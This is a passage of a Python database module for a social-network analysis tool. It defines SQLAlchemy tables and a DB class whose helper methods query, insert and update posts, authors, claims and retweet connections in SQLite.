title = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n content = Column(Unicode, default=None)\n url_to_image = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self.author_guid, self.author, self.published_date, self.url, self.title, self.description,\n self.keywords)\n\n\nclass News_Article_Item(Base):\n __tablename__ = 'news_article_items'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n source_newsapi_internal_id = Column(Unicode, default=None)\n source_newsapi_internal_name = Column(Unicode, default=None)\n content = Column(Unicode, default=None)\n img_url = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self._author_guid, self.source_newsapi_internal_id, self.source_newsapi_internal_name,\n self.content, self.img_url)\n\n\nclass DB():\n '''\n Represents the primary blackboard of the system.\n The module must be the first one to setUp.\n '''\n\n def __init__(self):\n pass\n\n def setUp(self):\n configInst = getConfig()\n self._date = getConfig().eval(self.__class__.__name__, \"start_date\")\n self._pathToEngine = configInst.get(self.__class__.__name__, \"DB_path\") + \\\n configInst.get(self.__class__.__name__, \"DB_name_prefix\") + \\\n configInst.get(\"DEFAULT\", \"social_network_name\") + \\\n configInst.get(self.__class__.__name__, \"DB_name_suffix\")\n\n start_date = configInst.get(\"DEFAULT\", \"start_date\").strip(\"date('')\")\n self._window_start = datetime.datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n self._window_size = datetime.timedelta(\n seconds=int(configInst.get(\"DEFAULT\", \"window_analyze_size_in_sec\")))\n self._window_end = self._window_start + self._window_size\n\n if configInst.eval(self.__class__.__name__, \"remove_on_setup\"):\n self.deleteDB()\n\n self.engine = create_engine(\"sqlite:///\" + self._pathToEngine, echo=False)\n self.Session = sessionmaker()\n self.Session.configure(bind=self.engine)\n\n self.session = self.Session()\n\n self.posts = \"posts\"\n self.authors = \"authors\"\n self.author_features = \"author_features\"\n\n @event.listens_for(self.engine, \"connect\")\n def connect(dbapi_connection, connection_rec):\n dbapi_connection.enable_load_extension(True)\n if (getConfig().eval(\"OperatingSystem\", \"windows\")):\n full_path = os.path.abspath(\"%s%s\") % (configInst.get(\"DB\", \"DB_path_to_extension\"), '.dll')\n dbapi_connection.execute('SELECT load_extension(\"{}\")'.format(full_path).replace('\\\\', '/'))\n if (getConfig().eval(\"OperatingSystem\", \"linux\")):\n dbapi_connection.execute(\n 'SELECT load_extension(\"%s%s\")' % (configInst.get(\"DB\", \"DB_path_to_extension\"), '.so'))\n if (getConfig().eval(\"OperatingSystem\", \"mac\")):\n dbapi_connection.execute(\n 'SELECT load_extension(\"%s%s\")' % (configInst.get(\"DB\", \"DB_path_to_extension\"), '.dylib'))\n\n dbapi_connection.enable_load_extension(False)\n\n if getConfig().eval(self.__class__.__name__, \"dropall_on_setup\"):\n Base.metadata.drop_all(self.engine)\n\n Base.metadata.create_all(self.engine)\n pass\n\n def tearDown(self):\n if getConfig().eval(self.__class__.__name__, \"dropall_on_teardown\"):\n if (os.path.exists(self._pathToEngine)):\n Base.metadata.drop_all(self.engine)\n\n if getConfig().eval(self.__class__.__name__, \"remove_on_teardown\"):\n self.deleteDB()\n\n if getConfig().eval(self.__class__.__name__, \"vacuum_db\"):\n self.vacuum_db()\n\n def vacuum_db(self):\n query = text(\"VACUUM;\")\n self.session.execute(query)\n\n def execute(self, window_start):\n pass\n\n def cleanUp(self, window_start):\n pass\n\n def canProceedNext(self, window_start):\n return True\n\n def is_well_defined(self):\n return True\n\n ##########################################################\n # miscellaneous\n def deleteDB(self):\n if (os.path.exists(self._pathToEngine)):\n try:\n os.remove(self._pathToEngine)\n except:\n logging.exception(\"Data Base %s remove failed\" % self._pathToEngine)\n\n def commit(self):\n self.session.commit()\n\n def is_post_topic_mapping_table_exist(self):\n query = text(\"SELECT name FROM sqlite_master WHERE type='table' AND name='post_topic_mapping'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n def is_topics_table_exist(self):\n query = text(\"SELECT name FROM sqlite_master WHERE type='table' AND name='topics'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n def is_table_exist(self, table_name):\n q = \"SELECT name FROM sqlite_master WHERE type='table' AND name=\" + \"\\'\" + table_name + \"\\'\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n def get_key_posts(self):\n query = text(\"SELECT post_id FROM export_key_posts\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return [rec[0] for rec in records]\n\n def delete_post_representativeness_data(self):\n query = text(\"DELETE FROM posts_representativeness;\")\n self.session.execute(query)\n\n def get_retweets_with_no_tweet_citation(self):\n '''\n :return: a list of post_ids and urls of retweets whose connection doesn't contain any reference to twitter\n '''\n query = text(\"select posts.post_id as post_id_from, posts.url as url_from \" \\\n \"from posts \" \\\n \"where posts.content like \\'%RT @%\\' \" \\\n \"Except \"\n \"select post_citations.post_id_from, post_citations.url_from from post_citations where post_citations.url_to like \\'%twitter.com%\\'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def is_post_citation_exist(self, post_id_from, post_id_to):\n query = text(\n \"select * from post_citations where post_citations.post_id_from = :post_id_from and post_citations.post_id_to = :post_id_to\")\n result = self.session.execute(query, params=dict(post_id_from=post_id_from, post_id_to=post_id_to))\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) > 0\n\n def get_topic_to_author_mapping(self, target_author_field):\n '''\n :return: a mapping of -> -> for each topic\n '''\n ans = {}\n query = text(\"\"\"select max_topic_id, authors.{0}, count(*) as posts_in_topic_count \n from post_topic_mapping , posts , authors \n where post_topic_mapping.post_id = posts.post_id \n and authors.author_guid = posts.author_guid \n group by max_topic_id, author \n order by max_topic_id\"\"\".format(target_author_field))\n result = self.session.execute(query)\n for topic_id, author, posts_in_topic_count in result:\n if not topic_id in ans:\n ans[topic_id] = {}\n ans[topic_id][author] = posts_in_topic_count\n return ans\n\n def get_topics(self):\n query = text(\"select * from topics\")\n result = self.session.execute(query)\n return [r for r in result]\n\n def update_json_post_retweeter(self, id, key, value):\n update_query = \"UPDATE \" + self.post_retweeter_table + \" SET \" + key + \"=\" + str(\n value) + \" WHERE retweeter_id=\" + str(id)\n self.update_query(update_query)\n\n def update_query(self, query):\n self.session.execute(query)\n self.session.commit()\n\n def get_json_post_retweeter(self, post_id, retweeter_id):\n query = \"SELECT * FROM \" + self.post_retweeter_table + \\\n \" WHERE post_id=\" + str(post_id) + \" AND retweeter_id=\" + str(retweeter_id)\n result = self.session.execute(query)\n cursor = result.cursor\n post_retweeter_result = cursor.fetchall()\n\n if len(post_retweeter_result):\n twitter_user = self.create_post_retweeter(post_retweeter_result)\n return twitter_user\n return None\n\n def encode_field_into_utf8(self, text):\n if text is not None:\n return str(text)\n return text\n\n ###########################################################\n # posts\n ###########################################################\n\n def create_object(self, query_result):\n\n object = query_result[0]\n\n '''\n post.post_id = values[0]\n post.author_id = values[1]\n post.post_twitter_id = values[2]\n post.post_vico_guid = values[3]\n post.text = values[4]\n post.title = values[5]\n post.retweet_count = values[6]\n post.favorites_count = values[7]\n post.created_at = values[8]\n post.url = values[9]\n post.is_detailed = values[10]\n post.is_LB = values[11]\n post.domain = values[12]\n '''\n return object\n\n def delete_post(self, post_id):\n # delete_query = \"DELETE FROM \" + self.posts + \" WHERE post_id=\" + str(post_id)\n # self.session.execute(delete_query)\n # self.session.commit()\n\n self.session.query(Post).filter(Post.post_id == post_id).delete()\n self.session.commit()\n\n def get_post_by_id(self, post_id):\n\n query = self.session.query(Post).filter(Post.post_id == post_id)\n posts_result = query.all()\n\n # query = \"SELECT * FROM \" + self.posts + \" WHERE post_id=\" + str(post_id)\n # result = self.session.execute(query)\n # cursor = result.cursor\n # posts_result = cursor.fetchall()\n\n if len(posts_result):\n post = self.create_object(posts_result)\n return post\n return None\n\n def get_posts(self):\n entries = self.session.query(Post).all()\n return entries\n\n def get_posts_without_retweet_connections(self):\n entries = self.session.query(Post).filter(and_(~exists().where(Post.post_id==PostRetweeterConnection.post_osn_id), Post.domain != 'retweet')).all()\n return entries\n\n def get_posts_with_retweet_connections(self):\n entries = self.session.query(Post).filter(\n and_(exists().where(Post.post_id == PostRetweeterConnection.post_osn_id), Post.domain != 'retweet')).all()\n return entries\n\n def get_posts_retweets_dict_gen(self, limit = 10):\n source_posts = aliased(Post, name='source_posts')\n retweets = aliased(Post, name='retweets')\n # entries = self.session.query(source_posts, retweets).filter(\n # and_(source_posts.post_id == PostRetweeterConnection.post_osn_id,\n # retweets.post_id == PostRetweeterConnection.retweeter_twitter_id,\n # source_posts.domain != u'retweet')).yield_per(10000).enable_eagerloads(False)\n entries = self.session.query(PostRetweeterConnection.post_osn_id, PostRetweeterConnection.retweeter_twitter_id)\n source_retweets_dict = defaultdict(list)\n for source_id, retweet_id in entries:\n source_retweets_dict[source_id].append(retweet_id)\n if len(list(source_retweets_dict.keys())) == limit:\n yield source_retweets_dict\n source_retweets_dict = defaultdict(list)\n yield source_retweets_dict\n\n def get_author_connection_by_source(self, source_ids):\n entries = self.session.query(AuthorConnection.source_author_guid, AuthorConnection.destination_author_guid).filter(AuthorConnection.source_author_guid.in_(set(source_ids)))\n author_connection_dict = defaultdict(set)\n for source_id, dest_id in entries:\n author_connection_dict[source_id].add(dest_id)\n return author_connection_dict\n\n def get_claims(self):\n return self.session.query(Claim).all()\n\n def get_claims_without_tweets(self):\n claims_with_tweets = self.session.query(Claim_Tweet_Connection.claim_id)\n return self.session.query(Claim).filter(~Claim.claim_id.in_(claims_with_tweets)).all()\n\n def get_claims_without_keywords(self):\n claims_with_keywords = self.session.query(Claim_Keywords_Connections.claim_id)\n return self.session.query(Claim).filter(~Claim.claim_id.in_(claims_with_keywords)).all()\n\n def get_claims_by_domain(self, domain):\n return self.session.query(Claim).filter(Claim.domain == domain).all()\n\n def get_posts_with_no_dates(self):\n records = self.session.query(Post).filter(Post.date == '2007-01-01 00:00:00').all()\n return records\n\n def get_all_posts(self):\n entries = self.session.query(Post).all()\n return entries\n\n def get_post_dictionary(self):\n posts = self.session.query(Post).yield_per(100000).enable_eagerloads(False)\n post_id_post_dict = defaultdict()\n for i, post in enumerate(posts):\n print('\\r load posts {}'.format(str(i+1)), end=\"\")\n post_id = post.post_id\n post_id_post_dict[post_id] = post\n print()\n return post_id_post_dict\n\n def get_elements_by_args(self, args, offset=0, author_guids=None):\n source_table = args['source']['table_name']\n source_id = args['source']['id']\n source_where_clauses = []\n if 'where_clauses' in args['source']:\n source_where_clauses = args['source']['where_clauses']\n\n connection_table_name = args['connection']['table_name']\n connection_source_id = args['connection']['source_id']\n connection_targeted_id = args['connection']['target_id']\n connection_where_clauses = []\n if 'where_clauses' in args['connection']:\n connection_where_clauses = args['connection']['where_clauses']\n\n destination_table_name = args['destination']['table_name']\n destination_id = args['destination']['id']\n destination_where_clauses = []\n if 'where_clauses' in args['destination']:\n destination_where_clauses = args['destination']['where_clauses']\n\n source_table = aliased(self.get_table_by_name(source_table), name=\"source\")\n connection_table = self.get_table_by_name(connection_table_name)\n destination_table = aliased(self.get_table_by_name(destination_table_name), name=\"dest\")\n connection_conditions = self._get_connection_conditions(connection_where_clauses, destination_table,\n source_table)\n\n source_conditions = self._get_conditions_from_where_cluases(source_table, source_where_clauses)\n destination_conditions = self._get_conditions_from_where_cluases(destination_table, destination_where_clauses)\n conditions = source_conditions + destination_conditions + connection_conditions\n source_id_attr = getattr(source_table, source_id)\n connection_source_attr = getattr(connection_table, connection_source_id)\n connection_target_attr = getattr(connection_table, connection_targeted_id)\n destination_id_attr = getattr(destination_table, destination_id)\n\n if author_guids:\n conditions.append(~connection_source_attr.in_(set(author_guids)))\n\n table_elements = self.session.query(connection_source_attr, destination_table) \\\n .join(source_table, connection_source_attr == source_id_attr) \\\n .join(destination_table, connection_target_attr == destination_id_attr) \\\n .filter(and_(condition for condition in conditions)) \\\n .order_by(connection_source_attr) \\\n .yield_per(10000).enable_eagerloads(False).offset(offset)\n\n return table_elements\n\n def _get_connection_conditions(self, connection_where_clauses, destination_table, source_table):\n connection_conditions = []\n for where_clause in connection_where_clauses:\n val1 = where_clause[\"val1\"]\n val2 = where_clause[\"val2\"]\n val1_attr = self._get_table_attr_by_prefix(destination_table, source_table, val1)\n val2_attr = self._get_table_attr_by_prefix(destination_table, source_table, val2)\n op_name = where_clause[\"op\"]\n if op_name == \"timeinterval\":\n delta = where_clause[\"delta\"]\n binary_exp1 = func.datetime(val1_attr, \"-{0} day\".format(delta)) <= val2_attr\n binary_exp2 = func.datetime(val1_attr, \"+{0} day\".format(delta)) >= val2_attr\n connection_conditions.append(binary_exp1)\n connection_conditions.append(binary_exp2)\n\n elif op_name == \"before\":\n delta = where_clause[\"delta\"]\n binary_exp1 = func.datetime(val1_attr, \"-{0} day\".format(delta)) <= val2_attr\n binary_exp2 = val1_attr > val2_attr\n connection_conditions.append(binary_exp1)\n connection_conditions.append(binary_exp2)\n elif op_name == \"after\":\n delta = where_clause[\"delta\"]\n binary_exp1 = val1_attr <= val2_attr\n binary_exp2 = func.datetime(val1_attr, \"+{0} day\".format(delta)) >= val2_attr\n connection_conditions.append(binary_exp1)\n connection_conditions.append(binary_exp2)\n else:\n\n binary_exp = val1_attr.op(op_name)(val2_attr)\n connection_conditions.append(binary_exp)\n return connection_conditions\n\n def _get_table_attr_by_prefix(self, destination_table, source_table, val1):\n if \"source\" in val1:\n val1_attr = getattr(source_table, val1.replace('source.', ''))\n elif \"dest\" in val1:\n val1_attr = getattr(destination_table, val1.replace('dest.', ''))\n else:\n val1_attr = val1\n return val1_attr\n\n def get_table_elements_by_ids(self, table_name, id_field, ids, where_cluases=[]):\n table_elements = self.get_table_elements_by_where_cluases(table_name, where_cluases, id_field)\n ids_set = set(ids)\n table_elements = [element for element in table_elements if getattr(element, id_field) in ids_set]\n return table_elements\n\n def get_table_elements_by_where_cluases(self, table_name, where_cluases, data_id, offset=0, author_guids=None):\n table = self.get_table_by_name(table_name)\n conditions = self._get_conditions_from_where_cluases(table, where_cluases)\n if author_guids:\n conditions.append(~getattr(table, data_id).in_(set(author_guids)))\n\n table_elements = self.session.query(table) \\\n .filter(and_(condition for condition in conditions)) \\\n .order_by(data_id) \\\n .yield_per(10000).enable_eagerloads(False).offset(offset)\n return table_elements\n\n def _get_conditions_from_where_cluases(self, table, where_cluases):\n conditions = []\n for where_clause_dict in where_cluases:\n field_name = where_clause_dict['field_name']\n value = where_clause_dict['value']\n op_name = '='\n if 'op' in where_clause_dict:\n op_name = where_clause_dict['op']\n try:\n table_attr = getattr(table, field_name)\n binary_exp = table_attr.op(op_name)(value)\n except:\n table_attr = field_name\n binary_exp = field_name == value\n conditions.append(binary_exp)\n return conditions\n\n def get_table_dictionary(self, table_name, table_id):\n table = self.get_table_by_name(table_name)\n posts = self.session.query(table).all()\n post_id_post_dict = defaultdict()\n for post in posts:\n post_id = getattr(post, table_id)\n post_id_post_dict[post_id] = post\n return post_id_post_dict\n\n def get_filterd_author_dict(self, author_ids):\n authors = self.session.query(Author).filter(Author.author_guid.in_(author_ids)).yield_per(10000).enable_eagerloads(False)\n author_id_author_dict = defaultdict()\n for i, author in enumerate(authors):\n print('\\rload authors {}'.format(i), end='')\n author_guid = getattr(author, 'author_guid')\n author_id_author_dict[author_guid] = author\n print()\n return author_id_author_dict\n\n def get_filterd_source_dict(self, source_ids, table_name, key_name):\n table = self.get_table_by_name(table_name)\n key_field = getattr(table, key_name)\n\n items = self.session.query(table).filter(key_field.in_(source_ids)).yield_per(10000).enable_eagerloads(False)\n source_id_source_dict = defaultdict()\n for i, item in enumerate(items):\n print('\\rload {} {}'.format(table_name, str(i+1)), end='')\n item_key = getattr(item, key_name)\n source_id_source_dict[item_key] = item\n print()\n return source_id_source_dict\n\n def get_author_dictionary(self):\n return self.authors_dict_by_field('author_guid')\n\n def authors_dict_by_field(self, field='author_guid'):\n authors = self.session.query(Author).yield_per(10000).enable_eagerloads(False)\n author_id_author_dict = defaultdict()\n for i, author in enumerate(authors):\n print('\\rload authors {}'.format(i), end='')\n author_guid = getattr(author, field)\n author_id_author_dict[author_guid] = author\n print()\n return author_id_author_dict\n\n def get_author_guid_posts_dict(self):\n posts = self.session.query(Post).yield_per(10000).enable_eagerloads(False)\n author_guid_posts_dict = defaultdict(list)\n for post in posts:\n author_guid_posts_dict[post.author_guid].append(post)\n return author_guid_posts_dict\n\n def _get_posts_content_screen_name_tuples(self):\n logging.info(\"Get all post content\")\n q = \"SELECT DISTINCT posts.content,posts.author \" \\\n \"FROM posts \" \\\n \"WHERE posts.domain = 'Microblog'\"\n\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n # records = list(cursor.fetchall())\n # return records\n\n def get_posts_by_domain(self, domain):\n posts_by_user = {}\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(\"select posts.author_guid, posts.date, posts.content from posts where posts.domain = :domain \"\n \"and length(posts.content)>0 and posts.date IS NOT NULL\")\n counter = 0\n print(\"schema_definition.get_posts_by_domain before executing query..\")\n result = self.session.execute(query, params=dict(domain=domain))\n print(\"schema_definition.get_posts_by_domain finished executing query..\")\n cursor = result.cursor\n print(\"schema_definition.get_posts_by_domain before calling generator function\")\n posts = self.result_iter(cursor, arraysize=10000)\n print(\"schema_definition.get_posts_by_domain after calling generator function\")\n\n posts_by_user = self._create_user_posts_dictinary(posts)\n # TODO added by lior, needs to verify that it doesn't break anything\n if len(posts_by_user) == 0:\n guid = self.get_author_guids()\n posts_by_user = {author: () for author in guid}\n return posts_by_user\n\n def get_author_posts_dict_by_minimal_num_of_posts(self, domain, min_num_of_posts):\n query = \"\"\"\n SELECT posts.author_guid, posts.date, posts.content\n FROM posts\n WHERE posts.author_guid IN (\n\t SELECT posts.author_guid\n\t FROM posts\n\t WHERE posts.domain = :domain\n\t AND LENGTH(posts.content)>0\n\t GROUP BY posts.author_guid\n\t HAVING COUNT(*) >= :min_num_of_posts\n )\n \"\"\"\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(query)\n result = self.session.execute(query, params=dict(domain=domain, min_num_of_posts=min_num_of_posts))\n cursor = result.cursor\n posts = self.result_iter(cursor, arraysize=10000)\n posts_by_user = self._create_user_posts_dictinary(posts)\n return posts_by_user\n\n def get_random_author_posts_dict_by_minimal_num_of_posts(self):\n query = \"\"\"\n SELECT posts.author_guid, posts.date, posts.content\n FROM posts\n WHERE LENGTH(posts.content)>0\n AND posts.author_guid IN (\n SELECT random_authors_for_graphs.author_guid\n FROM random_authors_for_graphs\n )\n \"\"\"\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n posts = self.result_iter(cursor) # , arraysize=10000)\n posts_by_user = self._create_user_posts_dictinary(posts)\n return posts_by_user\n\n def _create_user_posts_dictinary(self, posts):\n posts_by_user = defaultdict(list)\n counter = 0\n for current_post in posts:\n counter += 1\n if counter % 5000 == 0:\n msg = \"\\r Creating post objects \" + str(counter)\n print(msg, end=\"\")\n str_date = current_post[1]\n date_obj = datetime.datetime.strptime(str_date, '%Y-%m-%d %H:%M:%S')\n post = Struct(author_guid=current_post[0], date=date_obj, content=current_post[2])\n\n posts_by_user[str(post.author_guid)].append(post)\n return posts_by_user\n\n def get_single_post_per_author_topic_mapping(self):\n q = \" select * from single_post_per_author_topic_mapping\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n result = list(cursor.fetchall())\n return result\n\n def get_posts_by_author_guid(self, author_guid):\n\n query = self.session.query(Post).filter(Post.author_guid == author_guid).order_by(Post.date)\n entries = query.all()\n return entries\n\n \"\"\"\n if window_start and window_end is not given search in all DB\n \"\"\"\n\n def isPostExist(self, url, window_start=None, window_end=None):\n\n if window_start is None or window_end is None:\n query = text(\"SELECT EXISTS(SELECT * FROM posts WHERE (url= :url) limit 1)\")\n result = self.session.execute(query, params=dict(url=str(url)))\n return [r for (r,) in result][0]\n else:\n query = text(\n \"SELECT EXISTS(SELECT * FROM posts WHERE (url= :url or guid= :guid) and (:window_start <= date and \"\n \"date <=:window_end) limit 1)\")\n result = self.session.execute(query,\n params=dict(url=str(url), window_start=window_start, window_end=window_end))\n return [r for (r,) in result][0]\n\n def addPost(self, post):\n self.session.merge(post)\n\n def addPosts(self, posts):\n logging.info(\"total Posts inserted to DB: \" + str(len(posts)))\n i = 1\n self.session.flush()\n for post in posts:\n if (i % 100 == 0):\n msg = \"\\r Insert post to DB: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n self.addPost(post)\n # self.session.flush()\n self.session.commit()\n if len(posts) != 0: print(\"\")\n\n def merge_items(self, items):\n logging.info(\"total items inserted to DB: \" + str(len(items)))\n for i, item in enumerate(items):\n if (i % 100 == 0):\n msg = \"\\r Insert items to DB: [{}\".format(str(i + 1)) + \"/\" + str(len(items)) + ']'\n print(msg, end=\"\")\n self.session.merge(item)\n\n def updatePost(self, post):\n self.session.query(Post).filter(Post.url == post[0]).update(post[1])\n\n def updatePosts(self, posts):\n logging.info(\"total Posts updated to DB: \" + str(len(posts)))\n i = 1\n for post in posts:\n msg = \"\\r update post to DB: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n self.updatePost(post)\n self.session.commit()\n if len(posts) != 0: print(\"\")\n\n def getPostUsingURL(self, url, window_start=None, window_end=None):\n if window_start is None or window_end is None:\n query = self.session.query(Post).filter(Post.url == url)\n else:\n query = self.session.query(Post).filter(\n and_(Post.url == url, window_start <= Post.date, Post.date <= window_end))\n return query.all()\n\n def isRefExist(self, url):\n q = text(\"SELECT EXISTS(SELECT * FROM posts WHERE url= :url limit 1)\")\n res = self.session.execute(q, params=dict(url=str(url)))\n return [r for (r,) in res][0]\n\n def isPostNotDetailed(self, url, guid):\n q = text(\"SELECT EXISTS(SELECT * FROM posts WHERE (url= :url or guid= :guid) and \\\n is_detailed=0 limit 1)\")\n res = self.session.execute(q, params=dict(url=str(url), guid=str(guid)))\n return [r for (r,) in res][0]\n\n def addReference(self, reference):\n self.session.merge(reference)\n\n def addReferences(self, references):\n i = 1\n for ref in references:\n msg = \"\\r Add ref: [{}\".format(i) + \"/\" + str(len(references)) + ']'\n print(msg, end=\"\")\n i += 1\n self.addReference(ref)\n self.session.commit()\n\n def getPostsMaxDate(self, window_start=None, window_end=None):\n if window_start is None or window_end is None:\n res = self.session.query(func.max(Post.date))\n else:\n res = self.session.query(func.max(Post.date)).filter(\n and_(Post.date >= window_start, Post.date <= window_end))\n return res.scalar()\n\n def contains_post(self, post_url):\n q = text(\"select * from posts where posts.url = :post_url\")\n res = self.session.execute(q, params=dict(post_url=post_url))\n res = [r for r in res]\n return len(res) > 0\n\n ###########################################################\n # authors\n ###########################################################\n\n def insertIntoAuthorsTable(self, win_start, win_end):\n # TODO: remove window_start and window_end\n q = text(\n \"insert or ignore into authors(name,domain,author_guid, xml_importer_insertion_date) select distinct author,domain,author_guid, xml_importer_insertion_date from posts where author_guid>''\")\n self.session.execute(q)\n self.session.commit()\n\n def insert_or_update_authors_from_xml_importer(self, win_start, win_end):\n authors_to_update = []\n posts = self.session.query(Post).filter(Post.author_guid != \"\").all()\n logging.info(\"Insert or update_authors from xml importer\")\n logging.info(\"total Posts: \" + str(len(posts)))\n i = 1\n for post in posts:\n msg = \"\\r Insert or update posts: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n author_guid = post.author_guid\n domain = post.domain\n result = self.get_author_by_author_guid_and_domain(author_guid, domain)\n if not result:\n author = Author()\n author.name = post.author\n author.domain = post.domain\n author.author_guid = post.author_guid\n else:\n author = result[0]\n author.xml_importer_insertion_date = post.xml_importer_insertion_date\n authors_to_update.append(author)\n if len(posts) != 0: print(\"\")\n self.add_authors(authors_to_update)\n\n def addAuthor(self, author):\n self.session.merge(author)\n\n def addAuthors(self, authorsList):\n logging.info(\"total Posts inserted to DB: \" + str(len(authorsList)))\n i = 1\n for author in authorsList:\n if (i % 100 == 0):\n msg = \"\\r Insert author to DB: [{}\".format(i) + \"/\" + str(len(authorsList)) + ']'\n print(msg, end=\"\")\n i += 1\n self.addAuthor(author)\n self.commit()\n\n def insert_authors(self):\n query = text(\n \"insert or ignore into authors(author_screen_name) select distinct author_screen_name from posts where author_screen_name>''\")\n self.session.execute(query)\n self.session.commit()\n\n def get_authors(self):\n result = self.session.query(Author).all()\n return result\n\n def get_authors_media_pats(self):\n result = self.session.query(Author.media_path).filter(Author.media_path.isnot(None)).all()\n return result\n\n def get_authors_withot_connection(self, connection_type):\n # query = self.session.query(Author).filter(and_(Author.author_guid.in_(AuthorConnection.source_author_guid),\n # AuthorConnection.connection_type == connection_type))\n\n query = text(\"\"\"SELECT *\n FROM authors\n WHERE authors.author_guid NOT IN (SELECT source_author_guid \n FROM author_connections\n WHERE connection_type = :connection_type)\n \"\"\")\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n author_dicts = list(map(dict, result))\n authors = [Author(**author_dict) for author_dict in author_dicts]\n return authors\n\n def get_authors_with_connections(self, connection_type):\n # query = self.session.query(Author).filter(and_(Author.author_guid.in_(AuthorConnection.source_author_guid),\n # AuthorConnection.connection_type == connection_type))\n\n query = text(\"\"\"SELECT source_author_guid \n FROM author_connections\n WHERE connection_type = :connection_type\n \"\"\")\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n cursor = result.cursor\n tuples = cursor.fetchall()\n authors = set(chain(*tuples))\n return authors\n\n def get_reddit_authors(self):\n result = self.session.query(RedditAuthor).all()\n return result\n\n def get_reddit_posts(self):\n result = self.session.query(RedditPost).all()\n return result\n\n def get_all_authors(self):\n result = self.session.query(Author).all()\n return result\n\n def get_authors_by_domain(self, domain):\n targeted_social_network = getConfig().get(\"DEFAULT\", \"social_network_name\")\n # if targeted_social_network == Social_Networks.TWITTER:\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain)),\n # Author.author_osn_id.isnot(None),\n # or_(Author.xml_importer_insertion_date.isnot(None), Author.mark_missing_bad_actor_retweeters_insertion_date.isnot(None))).all()\n # else:\n result = self.session.query(Author).filter(and_(Author.domain == str(domain))\n ).all()\n\n return result\n\n def get_temp_author_connections_all(self):\n result = self.session.query(TempAuthorConnection).all()\n\n return result\n\n def get_authors_by_domain_dict(self):\n authors = self.get_authors()\n author_domain_dict = defaultdict(list)\n for author in authors:\n author_domain_dict[author.domain].append(author)\n return author_domain_dict\n\n def get_author_guid_to_author_dict(self):\n authors = self.get_all_authors()\n authors_dict = dict((aut.author_guid, aut) for aut in authors)\n return authors_dict\n\n # def get_authors_by_domain(self, domain):\n # targeted_social_network = getConfig().get(\"DEFAULT\", \"social_network_name\")\n # if targeted_social_network == Social_Networks.TWITTER:\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain)),\n # Author.author_osn_id.isnot(None),\n # or_(Author.xml_importer_insertion_date.isnot(None), Author.mark_missing_bad_actor_retweeters_insertion_date.isnot(None))).all()\n # else:\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain)),\n # Author.author_osn_id.isnot(None)\n # ).all()\n #\n # return result\n\n # def get_authors(self, domain):\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain),\n # Author.author_osn_id.isnot(None))\n # ).all()\n #\n # return result\n\n def get_number_of_targeted_osn_authors(self, domain):\n query = text(\"\"\"SELECT COUNT(authors.author_guid)\n FROM authors\n WHERE authors.domain = :domain\n AND authors.author_osn_id IS NOT NULL\n AND (authors.xml_importer_insertion_date IS NOT NULL\n OR authors.mark_missing_bad_actor_retweeters_insertion_date IS NOT NULL)\"\"\")\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n authors_count = tuples[0][0]\n return authors_count\n return None\n\n def get_number_of_authors(self):\n query = text(\"\"\"SELECT COUNT(authors.author_guid)\n FROM authors\"\"\")\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n authors_count = tuples[0][0]\n return authors_count\n return None\n\n def get_number_of_targeted_osn_posts(self, domain):\n query = text(\"\"\"SELECT COUNT(posts.author_guid)\n FROM posts\n WHERE posts.domain = :domain\"\"\")\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n posts_count = tuples[0][0]\n return posts_count\n return None\n\n def get_number_of_posts(self):\n query = text(\"\"\"SELECT COUNT(posts.author_guid)\n FROM posts\"\"\")\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n posts_count = tuples[0][0]\n return posts_count\n return None\n\n def get_author_by_guid(self, guid):\n ans = self.session.query(Author).filter(Author.author_guid == guid).all()\n return ans[0]\n\n def getAuthorByName(self, name):\n logging.info(\"Name of given author is: \" + name)\n return self.session.query(Author).filter(Author.name == name).all()\n\n def getAuthorIDbyNameAndDomain(self, name, start_wind, domain):\n res = self.session.query(Author.author_guid).filter(Author.name == name and Author.domain == domain).all()\n\n return [r for (r,) in res][0]\n\n def get_author_guid_and_author_osn_id(self, domain):\n data = {}\n query = text(\" SELECT author_guid, author_osn_id \\\n FROM authors \\\n 